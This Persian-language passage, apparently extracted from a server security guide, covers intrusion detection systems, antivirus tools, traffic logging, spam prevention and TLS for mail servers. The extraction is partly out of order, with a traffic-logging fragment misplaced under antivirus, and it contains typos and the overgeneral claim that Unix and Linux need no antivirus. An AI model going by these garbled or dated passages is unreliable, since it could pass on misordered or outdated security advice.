ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ،ﻫﺮ ﭘﺮﺩﺍﺯﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺎ ﮔﺮﻭﻩ ﻭ uidﺧﻮﺩﺵ ﺍﺟﺮﺍ ﮔﺮﺩﺩ .ﺍﮔﺮ ﺑﺘﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺩﺭ ﻗـﺴﻤﺖ ﻛـﻮﭼﻜﻲ
ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩ ،ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ )( chrootﻳﺎ )(.(jail
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺮﺍﻗﺐ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ؛ •
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﻘﺎﻁ ﺿﻌﻒ ﺷﺒﻜﻪﺍﻱ ﭘﻮﻳﺶ ﻣﻲﻛﻨﻨﺪ؛ •
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﻭ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻼﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺠﺎﻡ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ؛ ﻭ •
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻛﻠﻴﺔ ﻓﻌﻞ ﻭ ﺍﻧﻔﻌﺎﻻﺕ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻠﻬﺎﻱ ﺑﻌﺪﻱ ﺛﺒﺖ ﻭ ﺿﺒﻂ ﻣﻲﻧﻤﺎﻳﻨﺪ. •
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ )ﻣﻌﻤﻮ ﹰﻻ( ﻳﻚ ﺭﻭﺵ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻢ ﺍﺳـﺖ .ﺑﺮﺧـﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ
ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺗﺎ ﻧﻘﺎﻁ ﺿﻌﻒ ﺭﺍ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷﻤﺎ ﻧﻴﺰ ﺑﺎﻳﺪ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ )IDSﻫﺎ( ٢٠٦ﺩﺭ ﺩﻧﻴﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﺎﺩﻝ ﺩﺯﺩﮔﻴﺮﻫﺎ ﺩﺭ ﺯﻧﺪﮔﻲ ﻣﻌﻤﻮﻟﻲ ﻫﺴﺘﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴـﺪﺍ ﺍﺳـﺖ،
ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻫﻨﮕﺎﻡ ﻛﺎﺭ ﺭﺍﻳﺎﻧﻪ ،ﺑﺮ ﺁﻥ ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺘﺮﺻﺪ ﻳﺎﻓﺘﻦ ﻧﺸﺎﻧﻪﻫﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺗﻼﺵ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﻫﺴﺘﻨﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺑﺎﺷﻨﺪ .ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻣﺮﺍﻗﺐ ﻧﻔـﻮﺫ ﺑـﻪ
ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﺧﺎﺹ ﺍﺳﺖ .ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻤﻴﺰﻱ ﺍﻣﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺘﻜﻲ ﻫﺴﺘﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ
ﺷﺒﻜﻪ ،ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻋﻼﺋﻢ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ .ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻧﻈﺎﺭﺕ ﺑـﺮ
ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﺯ ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ Eternetﺑﻌﻨﻮﺍﻥ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺜﺎﻝ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ
ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ snortﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ
ﺑﺎﺯﺍﺭ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺩﺭ ﻣﺤﻴﻂ Windowsﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻫﻨﮕﺎﻡ ﺍﻧﺘﺨﺎﺏ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ،ﻧﻪﺗﻨﻬـﺎ ﺑـﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ
ﻣﺤﺼﻮﻝ ،ﺑﻠﻜﻪ ﺑﻪ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﺍﻫﻢﺷﺪﻩ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑـﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﺁﻥ ﻧﻴـﺰ ﺗﻮﺟـﻪ ﻛﻨﻴـﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻣﺪﻝ ﻋﻀﻮﻳﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻋﻀﻮﻳﺖ ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺍﺩﺍﻣـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻔﺘﮕﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻭ Linuxﻧﻴﺎﺯﻱ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻧﺪﺍﺭﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺴﺘﺮﻫﺎ ﺗﻨﻬﺎ ۳ﻳﺎ ۴ﻭﻳﺮﻭﺱ ﮔـﺰﺍﺭﺵﺷـﺪﻩ ﻛـﻪ ﻗﺎﺑﻠﻴـﺖ
ﺍﻧﺘﺸﺎﺭ ﭼﻨﺪﺍﻧﻲ ﻧﻴﺰ ﻧﺪﺍﺭﻧﺪ .ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻄﻬﺎ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﺓ ﺻﺤﺖ )ﻣﺜﻞ (Tripwireﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻛﺎﺭﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ،ﻛﺎﺭ ﻳﻚ
ﺿﺪﻭﻳﺮﻭﺱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺭﺳﺎﻧﺪ .ﺍﻳﻦ ﺩﺭ ﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ Mac OSﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ Macroﻫﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ
ﻭﻳﺮﻭﺱ ﺩﺭ ﻣﺤﺼﻮﻻﺕ Microsoft Officeﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺘﻲ Unixﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ
ﭘﺴﺘﻲ Windowsﺑﻜﺎﺭ ﺭﻭﺩ .ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺯﻳﺎﺩﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎﻱ Windowsﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ ،ﻭ ﻣﻲﺗﻮﺍﻥ ﺗﻨﻬـﺎ ﺑـﻪ ﻫﻤـﻴﻦ
ﻣﻨﻈﻮﺭ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ Unixﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ.
ﻻ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺩﻳﺴﻜﻬﺎﻱ ﺑﺰﺭﮒ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺩﻳـﺴﻚ ﺳـﺨﺖ ۸۰ﮔﻴﮕﺎﺑـﺎﻳﺘﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺗﺮﺍﻓﻴﻚ ﺣﺪﻭﺩ ﺩﻭ ﻫﻔﺘﺔ ﻳﻚ ﺷﺒﻜﺔ ﻣﻌﻤﻮﻟﻲ T1ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﻳﺎ ﺑـﺮﻭﺯ ﻫـﺮ ﺭﺧـﺪﺍﺩ ﺩﻳﮕـﺮ ،ﺑﺘـﻮﺍﻥ
ﺗﺮﺍﻓﻴﻚ ﺿﺒﻂﺷﺪﻩ ﺭﺍ ﺗﺤﺖ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻗﺮﺍﺭ ﺩﺍﺩ.
ﻫﺮﺯﻧﺎﻣﻪ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺗﺠﺎﺭﻱ )ﻛﻪ ﻋﻤﻮﻣﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﻮﻧﺪ( ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﺩﺭﺩﺳﺮﺳﺎﺯ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩﺍﻧﺪ .ﻫﻨﮕﺎﻡ ﺍﺭﺍﺋﻪ
ﺧﺪﻣﺎﺕ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻧﻪ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ ﻭ ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺩﺍﺧﻠﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺘﻨﺪ.
ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺑﻪﺭﻭﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ MTAﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ،ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺴﺒﺘﹰﺎ ﺁﺳﺎﻥ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ MTAﺑﺎ ﺗﻨﻈﻴﻤﺎﺕ ﺧﺎﺻﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﺗﺎ ﭘﻴﺎﻣﻬـﺎ ﺭﺍ ﺗﻨﻬـﺎ
ﺩﺭﺻﻮﺭﺗﻲ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ ﻛﻪ ﮔﻴﺮﻧﺪﺓ ﺁﻧﻬﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﺩﺍﺧﻠﻲ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ .ﻣﻨﻈـﻮﺭ ﺍﺯ "ﺭﺍﻳﺎﻧـﺔ
ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ" ﺩﺳﺘﮕﺎﻫﻲ ﺍﺳﺖ ﻛﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ IPﺧﺎﺹ ﻣﻲﺑﺎﺷﺪ )ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﻧﺸﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺣﺎﻟﺘﻲ ﻣﻌﺘﺒﺮ ﺍﺳﺖ ﻛﻪ ﺩﺳـﺘﮕﺎﻩ ﻣـﺬﻛﻮﺭ ﺩﺍﺧـﻞ ﻳـﻚ
ﻣﺤﻴﻂ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻳﻚ "ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ" ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﻣﺤﻴﻂ ﺍﺯ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ IPﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ( ،ﻭ ﻳﺎ ﺩﺳـﺘﮕﺎﻫﻲ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ،ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ.
ﻻ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔـﻲ ﻭ ﺳـﺎﻳﺮ ﺩﺳـﺘﮕﺎﻫﻬﺎﻳﻲ ﻛـﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻌﻤﻮ ﹰ
ﺁﺩﺭﺳﻬﺎﻱ IPﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﭘﻮﻳـﺎ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﻳـﻚ ﺭﻭﺵ ﭘﺮﻛـﺎﺭﺑﺮﺩ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ
SMTP AUTHﺍﺳﺖ ،ﻛﻪ ﺩﺭ ﻭﺍﻗﻊ ﺗﻜﺎﻣﻞﻳﺎﻓﺘﺔ ﭘﺮﻭﺗﻜﻞ SMTPﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ "ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺎﺩﻩ" ﻭ "ﻻﻳﺔ
ﺍﻣﻨﻴﺖ" ﻛﻪ ﺩﺭ RFCﺷﻤﺎﺭﺓ ۲۲۲۲ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩ ،ﺍﻣﻜـﺎﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﻣـﻲﺁﻭﺭﺩ .ﺭﺍﻫﻜـﺎﺭ ﺩﻳﮕـﺮ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ
٢٠٨
ﺳﺮﻭﻳﺲ۶ﮔﻴﺮﻧﺪﻩﻫﺎ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ TLSﺻﺎﺩﺭ ﺷﻮﺩ ﻭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻧﻬﺎ ﻧﻴﺰ ﭘﺮﻭﺗﻜﻞ STARTTLSﺑﻜﺎﺭ ﺭﻭﺩ.
ﻛﺴﺎﻧﻲ ﻛﻪ ﺩﺭﻭﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻭ ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺷﺒﻜﺔ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺷﻐﺎﻝ ﻛﻨﻨﺪ ﻭ ﺑﺴﺮﻋﺖ ﺍﻋﺘﺒﺎﺭ ﺷـﻤﺎ
ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻋﻠﻴﻪ ﺷﻤﺎ ﺍﻗﺪﺍﻣﺎﺕ ﻗـﺎﻧﻮﻧﻲ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ ٢٠٩ .ﻳـﻚ ﺭﻭﺵ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ
ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺍﻓﺮﺍﺩ ﺩﺍﺧﻠﻲ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﻪ ﻣﻘﺎﺻـﺪﻱ ﺧـﺎﺭﺝ ﺍﺯ
ﺷﺒﻜﻪ ﺩﺍﺭﻧﺪ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﺑﺮ ﺁﻧﻬﺎ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤـﻲ ﺩﺍﺭﻳـﺪ .ﻳـﻚ ﺭﺍﻩ ﻋﻤﻠـﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ
ﻣﻨﻈﻮﺭ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻴﺮﻭﻥﺭﻭﻧﺪﻩ ﺍﺯ ﭘﻮﺭﺕ ) TCP 25ﭘﻮﺭﺕ ﺳـﺮﻭﻳﺲ (SMTPﺭﺍ ﺩﺭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺴﺪﻭﺩ ﻛﻨﻴـﺪ ﻭ ﺗﻨﻬـﺎ ﺑـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﭼﻨﻴﻦ ﺍﺭﺗﺒﺎﻃﺎﺗﻲ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ.
ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺻﺤﺖ
ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ MTAﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ TLSﺭﺍ ﻣﺠﺎﺯ ﻳﺎ ﺍﺟﺒـﺎﺭﻱ ﻛﻨﻨـﺪ .ﭘﺮﻭﺗﻜـﻞ
SMTPﺑﮕﻮﻧﻪﺍﻱ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﻛﻪ ﻳﻚ ﻋﻤﻠﻴﺎﺕ - STARTLSﺁﻏﺎﺯﮔﺮ ﮔﻔﺘﮕﻮﻱ - TLSﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ TLSﻣﺆﻛـﺪﹰﺍ
ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ،ﭼﺮﺍﻛﻪ ﻫﻢ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻫﻢ ﺍﺯ ﺻﺤﺖ ﭘﻴﺎﻣﻬﺎ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩ
ﻧﻴﺰ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺻﺤﻴﺢ ﻣﺘﺼﻞ ﺍﺳﺖ.
ﺑﺼﻮﺭﺕ ﻣﺸﺎﺑﻪ ،ﺍﮔﺮ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﺘﺎﻥ ﺳﺮﻭﻳﺲ POPﻳﺎ IMAPﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ،ﺑﻴﺸﺘﺮ ﻣﺸﺘﺮﻳﺎﻥ ﻓﻌﻠﻲﺗﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ
